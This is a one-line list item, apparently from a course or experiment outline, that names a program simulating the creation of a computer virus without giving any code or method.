2. Experiment: a program that simulates the creation of a computer virus.
